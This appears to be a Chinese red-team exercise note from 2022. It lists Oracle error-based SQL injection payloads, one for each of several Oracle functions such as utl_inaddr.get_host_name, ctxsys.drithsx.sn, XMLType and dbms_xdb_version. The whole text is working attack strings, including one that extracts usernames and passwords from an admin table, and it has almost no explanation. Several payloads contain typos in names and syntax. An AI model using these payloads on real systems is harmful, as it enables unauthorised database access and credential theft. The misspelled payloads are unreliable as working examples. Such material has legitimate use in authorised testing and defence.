Oracle报错注入 · 2022护网笔记

[TOC] ## utl\_inaddr.get\_host\_name()报错注入 ``` and 1=utl_inaddr.get_host_name((select user from dual)) --+ ``` 爆出表的用户和密码 ``` and 1=utl_inaddr.get_host_name((select (select usename%7c%7cpasswod from admin) from dual)) --+ ``` ## ctxsys.drithsx.sn报错注入 ~~~ and 1=ctxsys.drithsx.sn(1,(select user from dual)) --+ ~~~ ## XMLType()报错注入 ~~~ and (select upper(XMLType(char(60||char(58)||(select user from dual)||char(64))) from dual) is not null --+ ~~~ ## dbms\_xdb\_version.checkin()报错注入 ~~~ and (select dbms_xdb_version.checkin((select user from dual)) from dual)is not null --+ ~~~ ## bms\_xdb\_version.makeversioned()报错注入 ~~~ and (select bms_xdb_version.makeversioned((select user from dual)) from dual)is not null --+ ~~~ ## dbms\_xdb\_version.uncheckout()报错注入 ~~~ and (select dbms_xdb_version.uncheckout((select user from dual)) from dual)is not null --+ ~~~ ## dbms\_utility.sqlid\_to\_sqlhash()报错注入 ~~~ and (SELECT dbms_utility.sqlid_to_sqlhash(select user from dual) from dual) is not null --+ ~~~ ## ordsys.ord\_dicom.getmappingxpath()报错注入 ~~~ and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user) --+ ~~~